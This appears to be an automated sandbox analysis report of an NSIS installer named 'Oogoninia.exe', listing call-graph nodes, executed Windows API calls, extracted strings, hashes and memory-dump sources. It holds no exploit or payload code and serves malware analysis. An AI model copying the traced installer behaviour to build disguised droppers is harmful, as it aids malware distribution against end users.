405b4c 4202->4204 4203->4011 4204->4203 4206 405b54 wsprintfA 4204->4206 4208 405dc2 18 API calls 4206->4208 4207 405b1b CloseHandle GetShortPathNameA 4207->4203 4209 405b2f 4207->4209 4210 405b7c 4208->4210 4209->4202 4209->4203 4228 405a13 GetFileAttributesA CreateFileA 4210->4228 4212 405b89 4212->4203 4213 405b98 GetFileSize GlobalAlloc 4212->4213 4214 405bba 4213->4214 4215 405c4f CloseHandle 4213->4215 4216 405a8b ReadFile 4214->4216 4215->4203 4217 405bc2 4216->4217 4217->4215 4229 405978 lstrlenA 4217->4229 4220 405bd9 lstrcpyA 4223 405bfb 4220->4223 4221 405bed 4222 405978 4 API calls 4221->4222 4222->4223 4224 405c32 SetFilePointer 4223->4224 4225 405aba WriteFile 4224->4225 4226 405c48 GlobalFree 4225->4226 4226->4215 4227->4207 4228->4212 4230 4059b9 lstrlenA 4229->4230 4231 405992 lstrcmpiA 4230->4231 4233 4059c1 4230->4233 4232 4059b0 CharNextA 4231->4232 4231->4233 4232->4230 4233->4220 4233->4221 5083 401000 5084 401037 BeginPaint GetClientRect 5083->5084 5085 40100c DefWindowProcA 5083->5085 5087 4010f3 5084->5087 5088 401179 5085->5088 5089 401073 CreateBrushIndirect FillRect DeleteObject 5087->5089 5090 4010fc 5087->5090 5089->5087 5091 401102 CreateFontIndirectA 5090->5091 5092 401167 EndPaint 5090->5092 5091->5092 5093 401112 6 API calls 5091->5093 5092->5088 5093->5092 5094 401900 5095 402ace 18 API calls 5094->5095 5096 401907 5095->5096 5097 405596 MessageBoxIndirectA 5096->5097 5098 401910 5097->5098 5099 401502 5100 40150a 5099->5100 5102 40151d 5099->5102 5101 402aac 18 API calls 5100->5101 5101->5102 4234 402483 4245 402bd8 4234->4245 4236 40248d 4249 402ace 4236->4249 4239 4024a0 RegQueryValueExA 4241 4024c0 4239->4241 4242 4024c6 RegCloseKey 4239->4242 4240 402729 4241->4242 4255 405cfe wsprintfA 4241->4255 4242->4240 4246 402ace 18 API calls 4245->4246 4247 402bf1 4246->4247 4248 402bff RegOpenKeyExA 4247->4248 4248->4236 4250 402ada 4249->4250 4251 405dc2 18 API calls 4250->4251 4252 402afb 4251->4252 4253 402496 4252->4253 4254 40600b 5 API calls 4252->4254 4253->4239 4253->4240 4254->4253 4255->4242 5103 100029c3 5104 100029db 5103->5104 5105 10001534 2 API calls 5104->5105 5106 100029f6 5105->5106 5107 401c04 5108 402aac 18 API calls 5107->5108 5109 401c0b 5108->5109 5110 402aac 18 API calls 5109->5110 5111 401c18 5110->5111 5112 401c2d 5111->5112 5113 402ace 18 API calls 5111->5113 5114 401c3d 5112->5114 5115 402ace 18 API calls 5112->5115 5113->5112 5116 401c94 5114->5116 5117 401c48 5114->5117 5115->5114 5119 402ace 18 API calls 5116->5119 5118 402aac 18 API calls 5117->5118 5120 401c4d 5118->5120 5121 401c99 5119->5121 5122 402aac 18 API calls 5120->5122 5123 402ace 18 API calls 5121->5123 5124 401c59 5122->5124 5125 401ca2 FindWindowExA 5123->5125 5126 401c84 SendMessageA 5124->5126 5127 401c66 SendMessageTimeoutA 5124->5127 5128 401cc0 5125->5128 5126->5128 5127->5128 4262 401389 4264 401390 4262->4264 4263 4013fe 4264->4263 4265 4013cb MulDiv SendMessageA 4264->4265 4265->4264 5129 40270b 5130 402ace 18 API calls 5129->5130 5131 402712 FindFirstFileA 5130->5131 5132 402735 5131->5132 5136 402725 5131->5136 5133 40273c 5132->5133 5137 405cfe wsprintfA 5132->5137 5138 405da0 lstrcpynA 5133->5138 5137->5133 5138->5136 5139 401490 5140 404fb9 25 API calls 5139->5140 5141 401497 5140->5141 5142 402590 5143 402595 5142->5143 5144 4025a9 5142->5144 5145 402aac 18 API calls 5143->5145 5146 402ace 18 API calls 5144->5146 5148 40259e 5145->5148 5147 4025b0 lstrlenA 5146->5147 5147->5148 5149 405aba WriteFile 5148->5149 5150 4025d2 5148->5150 5149->5150 5151 402c13 5152 402c22 SetTimer 5151->5152 5154 402c3b 5151->5154 5152->5154 5153 402c90 5154->5153 5155 402c55 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5154->5155 5155->5153 5156 404714 5157 404740 5156->5157 5158 404724 5156->5158 5160 404773 5157->5160 5161 404746 SHGetPathFromIDListA 5157->5161 5167 40557a GetDlgItemTextA 5158->5167 5163 404756 5161->5163 5166 40475d SendMessageA 5161->5166 5162 404731 SendMessageA 5162->5157 5164 40140b 2 API calls 5163->5164 5164->5166 5166->5160 5167->5162 4305 401d95 GetDC 4306 402aac 18 API calls 4305->4306 4307 401da7 GetDeviceCaps MulDiv ReleaseDC 4306->4307 4308 402aac 18 API calls 4307->4308 4309 401dd8 4308->4309 4310 405dc2 18 API calls 4309->4310 4311 401e15 CreateFontIndirectA 4310->4311 4312 40258a 4311->4312 4313 402695 4314 40269c 4313->4314 4316 40290b 4313->4316 4315 402aac 18 API calls 4314->4315 4317 4026a3 4315->4317 4318 4026b2 SetFilePointer 4317->4318 4318->4316 4319 4026c2 4318->4319 4321 405cfe wsprintfA 4319->4321 4321->4316 5168 10001058 5170 10001074 5168->5170 5169 100010dc 5170->5169 5171 10001091 5170->5171 5172 100014bb GlobalFree 5170->5172 5173 100014bb GlobalFree 5171->5173 5172->5171 5174 100010a1 5173->5174 5175 100010b1 5174->5175 5176 100010a8 GlobalSize 5174->5176 5177 100010b5 GlobalAlloc 5175->5177 5178 100010c6 5175->5178 5176->5175 5179 100014e2 3 API calls 5177->5179 5180 100010d1 GlobalFree 5178->5180 5179->5178 5180->5169 5181 404099 lstrcpynA lstrlenA 5182 401d1a 5183 402aac 18 API calls 5182->5183 5184 401d28 SetWindowLongA 5183->5184 5185 40295e 5184->5185 4432 40159d 4433 402ace 18 API calls 4432->4433 4434 4015a4 SetFileAttributesA 4433->4434 4435 4015b6 4434->4435 5191 40149d 5192 4014ab PostQuitMessage 5191->5192 5193 4022dd 5191->5193 5192->5193 4436 401a1e 4437 402ace 18 API calls 4436->4437 4438 401a27 ExpandEnvironmentStringsA 4437->4438 4439 401a3b 4438->4439 4441 401a4e 4438->4441 4440 401a40 lstrcmpA 4439->4440 4439->4441 4440->4441 4620 40171f 4621 402ace 18 API calls 4620->4621 4622 401726 SearchPathA 4621->4622 4623 401741 4622->4623 5194 100010e0 5203 1000110e 5194->5203 5195 100011c4 GlobalFree 5196 100012ad 2 API calls 5196->5203 5197 100011c3 5197->5195 5198 10001266 2 API calls 5201 100011b1 GlobalFree 5198->5201 5199 10001155 GlobalAlloc 5199->5203 5200 100011ea GlobalFree 5200->5203 5201->5203 5202 100012d1 lstrcpyA 5202->5203 5203->5195 5203->5196 5203->5197 5203->5198 5203->5199 5203->5200 5203->5201 5203->5202 5204 10002162 5205 100021c0 5204->5205 5206 100021f6 5204->5206 5205->5206 5207 100021d2 GlobalAlloc 5205->5207 5207->5205 5208 401e25 5209 402aac 18 API calls 5208->5209 5210 401e2b 5209->5210 5211 402aac 18 API calls 5210->5211 5212 401e37 5211->5212 5213 401e43 ShowWindow 5212->5213 5214 401e4e EnableWindow 5212->5214 5215 40295e 5213->5215 5214->5215 5216 401f2d 5217 402ace 18 API calls 5216->5217 5218 401f34 5217->5218 5219 4060a4 2 API calls 5218->5219 5220 401f3a 5219->5220 5222 401f4c 5220->5222 5223 405cfe wsprintfA 5220->5223 5223->5222 5224 404f2d 5225 404f51 5224->5225 5226 404f3d 5224->5226 5227 404f59 IsWindowVisible 5225->5227 5235 404f70 5225->5235 5228 404f43 5226->5228 5229 404f9a 5226->5229 5227->5229 5230 404f66 5227->5230 5232 403fd1 SendMessageA 5228->5232 5231 404f9f CallWindowProcA 5229->5231 5237 404884 SendMessageA 5230->5237 5234 404f4d 5231->5234 5232->5234 5235->5231 5242 404904 5235->5242 5238 4048e3 SendMessageA 5237->5238 5239 4048a7 GetMessagePos ScreenToClient SendMessageA 5237->5239 5241 4048db 5238->5241 5240 4048e0 5239->5240 5239->5241 5240->5238 5241->5235 5251 405da0 lstrcpynA 5242->5251 5244 404917 5252 405cfe wsprintfA 5244->5252 5246 404921 5247 40140b 2 API calls 5246->5247 5248 40492a 5247->5248 5253 405da0 lstrcpynA 5248->5253 5250 404931 5250->5229 5251->5244 5252->5246 5253->5250 5254 403ab2 5255 403c05 5254->5255 5256 403aca 5254->5256 5258 403c56 5255->5258 5259 403c16 GetDlgItem GetDlgItem 5255->5259 5256->5255 5257 403ad6 5256->5257 5260 403ae1 SetWindowPos 5257->5260 5261 403af4 5257->5261 5263 403cb0 5258->5263 5272 401389 2 API calls 5258->5272 5262 403f85 19 API calls 5259->5262 5260->5261 5265 403b11 5261->5265 5266 403af9 ShowWindow 5261->5266 5267 403c40 SetClassLongA 5262->5267 5264 403fd1 SendMessageA 5263->5264 5268 403c00 5263->5268 5294 403cc2 5264->5294 5269 403b33 5265->5269 5270 403b19 DestroyWindow 5265->5270 5266->5265 5271 40140b 2 API calls 5267->5271 5274 403b38 SetWindowLongA 5269->5274 5275 403b49 5269->5275 5273 403f0e 5270->5273 5271->5258 5276 403c88 5272->5276 5273->5268 5283 403f3f ShowWindow 5273->5283 5274->5268 5280 403bc0 5275->5280 5281 403b55 GetDlgItem 5275->5281 5276->5263 5277 403c8c SendMessageA 5276->5277 5277->5268 5278 40140b 2 API calls 5278->5294 5279 403f10 DestroyWindow EndDialog 5279->5273 5282 403fec 8 API calls 5280->5282 5284 403b85 5281->5284 5285 403b68 SendMessageA IsWindowEnabled 5281->5285 5282->5268 5283->5268 5287 403b92 5284->5287 5288 403bd9 SendMessageA 5284->5288 5289 403ba5 5284->5289 5297 403b8a 5284->5297 5285->5268 5285->5284 5286 405dc2 18 API calls 5286->5294 5287->5288 5287->5297 5288->5280 5292 403bc2 5289->5292 5293 403bad 5289->5293 5290 403f5e SendMessageA 5290->5280 5291 403f85 19 API calls 5291->5294 5296 40140b 2 API calls 5292->5296 5295 40140b 2 API calls 5293->5295 5294->5268 5294->5278 5294->5279 5294->5286 5294->5291 5298 403f85 19 API calls 5294->5298 5313 403e50 DestroyWindow 5294->5313 5295->5297 5296->5297 5297->5280 5297->5290 5299 403d3d GetDlgItem 5298->5299 5300 403d52 5299->5300 5301 403d5a ShowWindow EnableWindow 5299->5301 5300->5301 5322 403fa7 EnableWindow 5301->5322 5303 403d84 EnableWindow 5306 403d98 5303->5306 5304 403d9d GetSystemMenu EnableMenuItem SendMessageA 5305 403dcd SendMessageA 5304->5305 5304->5306 5305->5306 5306->5304 5323 403fba SendMessageA 5306->5323 5324 405da0 lstrcpynA 5306->5324 5309 403dfb lstrlenA 5310 405dc2 18 API calls 5309->5310 5311 403e0c SetWindowTextA 5310->5311 5312 401389 2 API calls 5311->5312 5312->5294 5313->5273 5314 403e6a CreateDialogParamA 5313->5314 5314->5273 5315 403e9d 5314->5315 5316 403f85 19 API calls 5315->5316 5317 403ea8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5316->5317 5318 401389 2 API calls 5317->5318 5319 403eee 5318->5319 5319->5268 5320 403ef6 ShowWindow 5319->5320 5321 403fd1 SendMessageA 5320->5321 5321->5273 5322->5303 5323->5306 5324->5309 5325 401eb3 5326 402ace 18 API calls 5325->5326 5327 401eb9 5326->5327 5328 404fb9 25 API calls 5327->5328 5329 401ec3 5328->5329 5330 405531 2 API calls 5329->5330 5333 401ec9 5330->5333 5331 401f1f CloseHandle 5335 402729 5331->5335 5332 401ee8 WaitForSingleObject 5332->5333 5334 401ef6 GetExitCodeProcess 5332->5334 5333->5331 5333->5332 5333->5335 5336 406175 2 API calls 5333->5336 5337 401f11 5334->5337 5338 401f08 5334->5338 5336->5332 5337->5331 5340 405cfe wsprintfA 5338->5340 5340->5337 4327 402336 4328 402ace 18 API calls 4327->4328 4329 402347 4328->4329 4330 402ace 18 API calls 4329->4330 4331 402350 4330->4331 4332 402ace 18 API calls 4331->4332 4333 40235a GetPrivateProfileStringA 4332->4333 5341 404936 GetDlgItem GetDlgItem 5342 404988 7 API calls 5341->5342 5348 404ba0 5341->5348 5343 404a2b DeleteObject 5342->5343 5344 404a1e SendMessageA 5342->5344 5345 404a34 5343->5345 5344->5343 5346 404a6b 5345->5346 5347 405dc2 18 API calls 5345->5347 5349 403f85 19 API calls 5346->5349 5351 404a4d SendMessageA SendMessageA 5347->5351 5355 404c84 5348->5355 5358 404884 5 API calls 5348->5358 5378 404c11 5348->5378 5354 404a7f 5349->5354 5350 404d30 5352 404d42 5350->5352 5353 404d3a SendMessageA 5350->5353 5351->5345 5362 404d54 ImageList_Destroy 5352->5362 5363 404d5b 5352->5363 5373 404d6b 5352->5373 5353->5352 5359 403f85 19 API calls 5354->5359 5355->5350 5360 404cdd SendMessageA 5355->5360 5384 404b93 5355->5384 5356 403fec 8 API calls 5361 404f26 5356->5361 5357 404c76 SendMessageA 5357->5355 5358->5378 5379 404a8d 5359->5379 5364 404cf2 SendMessageA 5360->5364 5360->5384 5362->5363 5366 404d64 GlobalFree 5363->5366 5363->5373 5368 404d05 5364->5368 5365 404eda 5369 404eec ShowWindow GetDlgItem ShowWindow 5365->5369 5365->5384 5366->5373 5367 404b61 GetWindowLongA SetWindowLongA 5370 404b7a 5367->5370 5374 404d16 SendMessageA 5368->5374 5369->5384 5371 404b80 ShowWindow 5370->5371 5372 404b98 5370->5372 5392 403fba SendMessageA 5371->5392 5393 403fba SendMessageA 5372->5393 5373->5365 5383 404904 4 API calls 5373->5383 5388 404da6 5373->5388 5374->5350 5375 404b5b 5375->5367 5375->5370 5378->5355 5378->5357 5379->5367 5379->5375 5380 404adc SendMessageA 5379->5380 5381 404b18 SendMessageA 5379->5381 5382 404b29 SendMessageA 5379->5382 5380->5379 5381->5379 5382->5379 5383->5388 5384->5356 5385 404eb0 InvalidateRect 5385->5365 5386 404ec6 5385->5386 5389 40483f 21 API calls 5386->5389 5387 404dd4 SendMessageA 5391 404dea 5387->5391 5388->5387 5388->5391 5389->5365 5390 404e5e SendMessageA SendMessageA 5390->5391 5391->5385 5391->5390 5392->5384 5393->5348 5394 4014b7 5395 4014bd 5394->5395 5396 401389 2 API calls 5395->5396 5397 4014c5 5396->5397 5398 401b39 5399 402ace 18 API calls 5398->5399 5400 401b40 5399->5400 5401 402aac 18 API calls 5400->5401 5402 401b49 wsprintfA 5401->5402 5403 40295e 5402->5403 5404 402939 SendMessageA 5405 402953 InvalidateRect 5404->5405 5406 40295e 5404->5406 5405->5406 4409 4015bb 4410 402ace 18 API calls 4409->4410 4411 4015c2 4410->4411 4412 4058ab 4 API calls 4411->4412 4425 4015ca 4412->4425 4413 401624 4415 401629 4413->4415 4417 401652 4413->4417 4414 40583d CharNextA 4414->4425 4428 401423 4415->4428 4419 401423 25 API calls 4417->4419 4424 40164a 4419->4424 4421 4054fc 2 API calls 4421->4425 4422 405519 5 API calls 4422->4425 4423 40163b SetCurrentDirectoryA 4423->4424 4425->4413 4425->4414 4425->4421 4425->4422 4426 40160c GetFileAttributesA 4425->4426 4427 40547f 4 API calls 4425->4427 4426->4425 4427->4425 4429 404fb9 25 API calls 4428->4429 4430 401431 4429->4430 4431 405da0 lstrcpynA 4430->4431 4431->4423 5407 4016bb 5408 402ace 18 API calls 5407->5408 5409 4016c1 GetFullPathNameA 5408->5409 5410 4016d8 5409->5410 5416 4016f9 5409->5416 5413 4060a4 2 API calls 5410->5413 5410->5416 5411 40170d GetShortPathNameA 5412 40295e 5411->5412 5414 4016e9 5413->5414 5414->5416 5417 405da0 lstrcpynA 5414->5417 5416->5411 5416->5412 5417->5416 5418 401d3b GetDlgItem GetClientRect 5419 402ace 18 API calls 5418->5419 5420 401d6b LoadImageA SendMessageA 5419->5420 5421 401d89 DeleteObject 5420->5421 5422 40295e 5420->5422 5421->5422

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 00403180 Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357stringcomfileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 403180-4031b5 SetErrorMode GetVersion 1 4031b7-4031bf call 406139 0->1 2 4031c8 0->2 1->2 7 4031c1 1->7 4 4031cd-4031e0 call 4060cb lstrlenA 2->4 9 4031e2-403255 call 406139 * 2 #17 OleInitialize SHGetFileInfoA call 405da0 GetCommandLineA call 405da0 GetModuleHandleA 4->9 7->2 18 403261-403276 call 40583d CharNextA 9->18 19 403257-40325c 9->19 22 40333b-40333f 18->22 19->18 23 403345 22->23 24 40327b-40327e 22->24 27 403358-403372 GetTempPathA call 40314f 23->27 25 403280-403284 24->25 26 403286-40328e 24->26 25->25 25->26 28 403290-403291 26->28 29 403296-403299 26->29 34 403374-403392 GetWindowsDirectoryA lstrcatA call 40314f 27->34 35 4033ca-4033e4 DeleteFileA call 402cfa 27->35 28->29 31 40332b-403338 call 40583d 29->31 32 40329f-4032a3 29->32 31->22 51 40333a 31->51 37 4032a5-4032ab 32->37 38 4032bb-4032e8 32->38 34->35 52 403394-4033c4 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 40314f 34->52 53 403478-403488 call 403646 OleUninitialize 35->53 54 4033ea-4033f0 35->54 44 4032b1 37->44 45 4032ad-4032af 37->45 40 4032ea-4032f0 38->40 41 4032fb-403329 38->41 47 4032f2-4032f4 40->47 48 4032f6 40->48 41->31 49 403347-403353 call 405da0 41->49 44->38 45->38 45->44 47->41 47->48 48->41 49->27 51->22 52->35 52->53 66 4035ac-4035b2 53->66 67 40348e-40349e call 405596 ExitProcess 53->67 57 4033f2-4033fd call 40583d 54->57 58 403468-40346f call 403720 54->58 71 403433-40343d 57->71 72 4033ff-403428 57->72 64 403474 58->64 64->53 69 4035b4-4035cd GetCurrentProcess OpenProcessToken 66->69 70 40362e-403636 66->70 78 4035ff-40360d call 406139 69->78 79 4035cf-4035f9 LookupPrivilegeValueA AdjustTokenPrivileges 69->79 73 403638 70->73 74 40363c-403640 ExitProcess 70->74 76 4034a4-4034b8 call 405519 lstrcatA 71->76 77 40343f-40344c call 405900 71->77 80 40342a-40342c 72->80 73->74 89 4034c5-4034df lstrcatA lstrcmpiA 76->89 90 4034ba-4034c0 lstrcatA 76->90 77->53 88 40344e-403464 call 405da0 * 2 77->88 91 40361b-403625 ExitWindowsEx 78->91 92 40360f-403619 78->92 79->78 80->71 84 40342e-403431 80->84 84->71 84->80 88->58 89->53 94 4034e1-4034e4 89->94 90->89 91->70 95 403627-403629 call 40140b 91->95 92->91 92->95 97 4034e6-4034eb call 40547f 94->97 98 4034ed call 4054fc 94->98 95->70 106 4034f2-4034ff SetCurrentDirectoryA 97->106 98->106 107 403501-403507 call 405da0 106->107 108 40350c-403534 call 405da0 106->108 107->108 112 40353a-403556 call 405dc2 DeleteFileA 108->112 115 403597-40359e 112->115 116 403558-403568 CopyFileA 112->116 115->112 117 4035a0-4035a7 call 405c5b 115->117 116->115 118 40356a-40358a call 405c5b call 405dc2 call 405531 116->118 117->53 118->115 127 40358c-403593 CloseHandle 118->127 127->115
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNELBASE ref: 004031A5
                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 004031AB
                                                                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004031D4
                                                                                                                                                                                    • #17.COMCTL32(00000007,00000009), ref: 004031F6
                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004031FD
                                                                                                                                                                                    • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403219
                                                                                                                                                                                    • GetCommandLineA.KERNEL32(Leafier Setup,NSIS Error), ref: 0040322E
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Oogoninia.exe",00000000), ref: 00403241
                                                                                                                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Oogoninia.exe",00000020), ref: 0040326C
                                                                                                                                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403369
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040337A
                                                                                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403386
                                                                                                                                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339A
                                                                                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033A2
                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033B3
                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033BB
                                                                                                                                                                                    • DeleteFileA.KERNELBASE(1033), ref: 004033CF
                                                                                                                                                                                      • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                                                                                                                                                      • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                                                                                                                                                    • OleUninitialize.OLE32(?), ref: 0040347D
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040349E
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004035BB
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004035C2
                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004035DA
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004035F9
                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 0040361D
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403640
                                                                                                                                                                                      • Part of subcall function 00405596: MessageBoxIndirectA.USER32(00409218), ref: 004055F1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                                                                                                    • String ID: "$"C:\Users\user\Desktop\Oogoninia.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Oogoninia.exe$C:\Users\user\slavelivets$C:\Users\user\slavelivets$Error launching installer$Leafier Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Klv$~nsu
                                                                                                                                                                                    • API String ID: 3329125770-746959003
                                                                                                                                                                                    • Opcode ID: bbf1fb5b53fc7b28b57eed0d95e8f77975159f1cadf5f6a8baec224272584505
                                                                                                                                                                                    • Instruction ID: 9be49b359e088d3119d2258a489a24960a077000951b0681bd3593dcca7d42e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: bbf1fb5b53fc7b28b57eed0d95e8f77975159f1cadf5f6a8baec224272584505
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03C107706086816EE7116F719D4DA2F3EACAF86306F44457FF482B52E2C77C4A058B2E
                                                                                                                                                                                    Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4227406936-0
                                                                                                                                                                                    • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                                                                                                    • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                                                                                                                    • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                                                                                                                    Function 00405DC2 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
